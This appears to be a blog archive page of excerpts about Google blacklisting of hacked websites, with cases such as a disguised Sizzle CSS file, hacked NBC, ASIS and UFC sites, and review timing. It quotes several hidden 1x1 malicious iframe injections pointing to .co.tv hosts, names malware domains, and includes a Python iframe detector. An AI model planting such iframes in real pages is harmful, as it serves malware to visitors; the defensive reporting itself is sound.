Understanding Google’s Blacklist – Cleaning Your Hacked Website and Removing From Blacklist

Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact that they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The idea is to give webmasters the insight required to understand what is going on, and how to troubleshoot things when a website is blacklisted.

Get Your Bearings

While investigating the website, we found that some Google shortened URLs were being loaded and redirecting to http://bls.pw/. Two of the goo.gl links were pointing to Wikipedia images, their icon to be specific, and one was redirecting to the http://bls.pw/ shortener.

goo.gl/9yBTe - http://bits.wikimedia.org/favicon/wikipedia.ico
goo.gl/hNVXP - http://bits.wikimedia.org/favicon/wikipedia.ico?2x2
goo.gl/24vi1 - http://bls.pw/

A quick search for this last URL took us to /wp-content/themes/Site’sTheme/css/iefix.sct. As malware writers like to do, it was trying to trick us into believing it was good code. In this case, the Sizzle CSS Selector Engine code (Real code here) was the target:

[Image: Sizzle CSS Selector Engine Modified III]


Understanding Search Engine Warnings – Part I – Google – This Site May Be Hacked

If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: I just found out that my site is being flagged on Google’s search engine results page with the message “This site may be hacked”. What does it mean?

Answer: This is a good question and one we see often from our clients. We see it so often that we decided to do a series on each type of blacklist warnings that show up on search engines. These are the warnings that we will cover in this series:


NBC Website HACKED – Be Careful Surfing

Breaking: the NBC site is currently compromised and blacklisted by Google. Anyone who visits the site (which includes any sub page) will have malicious iframes loaded as well, redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Leno's Garage and others.


If you are visiting it from Chrome or Firefox, you will get the following warning:


New Google Chrome Blacklist Warning for Macs

If you go to a site that is Blacklisted by Google, you will see a new (and prettier) malware warning now if you are using a Mac:

The Website Ahead Contains Malware!
Google Chrome Has Blocked access to site.com for now.
Even if you have visited this site safely in the past, visiting it now may infect your Mac with malware.

Nothing major has changed, but we found this new wording to be more clear for the end user. So good move from the Google/Chrome team.

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from “http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2”, a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.


Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send them over to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here.

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, its owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 minutes (13 hours)
  • Minimum time: 290 minutes (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.


Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!

Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.

However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj.co.tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap.co.tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf.co.tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc.), they are random and being mass generated.

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.
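One way a site owner could check their own pages for this pattern, as an added example that is not part of the original post: it flags iframes that are sized to be invisible or that load from the free zones named above. The zone list, the function names and the two example.* hosts in the sample are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Free zones named in the post; a working list for triage, not a blacklist.
SUSPECT_ZONES = (".co.cc", ".cz.cc", ".co.tv", ".co.be")
MAX_HIDDEN_PX = 1  # iframes this small are invisible to the visitor


def _px(value):
    """Return a width/height attribute as an int, or None if absent/non-numeric."""
    value = (value or "").strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdigit() else None


class IframeAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        host = (urlsplit(a.get("src") or "").hostname or "").lower()
        w, h = _px(a.get("width")), _px(a.get("height"))
        reasons = []
        if w is not None and h is not None and max(w, h) <= MAX_HIDDEN_PX:
            reasons.append("hidden-size")
        if host.endswith(SUSPECT_ZONES):
            reasons.append("suspect-zone")
        if reasons:
            self.findings.append(
                {"line": self.getpos()[0], "host": host, "reasons": reasons})


def audit(html):
    """Return one finding per suspicious iframe in an HTML document."""
    parser = IframeAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: two iframes quoted in the post, two made-up ones.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src="http://uhcmsgfq.co.tv/?go=1" width="1" height="1"></iframe>
<iframe width="1" height="1" src="http://vmvfonc.co.tv/?go=1"></iframe>
<iframe src="https://player.example.com/embed/42" width="640" height="360"></iframe>
<iframe src="http://tracker.example.net/px" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

A hidden iframe on a host outside the listed zones still gets a finding, which matters because the zone in use keeps changing.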

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

What to do when your site gets blacklisted

Most site owners only start to think about security when their site gets hacked (infected with malware) and blacklisted by Google.

So, here is what you need to do once you find out that your site is blacklisted:

*If you are registered with us already, don’t worry about it, just open a support request (we will take care of it).


ASIS International Website Blacklisted by Google

The official website (asisonline.org) of ASIS International, a major physical security association, was hacked and blacklisted yesterday. Add another case to the list of sites using outdated and/or vulnerable applications. In the case of ASIS, they were running a vulnerable version of OpenX (ad server software) and the attackers injected malicious code in there.

Anyone visiting the ASIS website has ads served from ads.asisonline.org which is the culprit. The ad server is loading malware from: hxxp://liyerfit.com/blogs/martin/. The malware string can be detected using our scanner.




UFC.com blacklisted by Google (indirectly)

Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google:


Warning: Visiting this site may harm your computer!
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

They are getting indirectly blacklisted because they are loading content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for having malware.

As far as clearspring is concerned, it seems they’ve been hacked and the attacker has added malicious code to load malware from semaniseme.com and wenmo.in. So multiple levels of indirection here to affect UFC.com users.

Anyone else using clearspring should remove their code from their sites until they have this blacklist issue sorted out.

To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.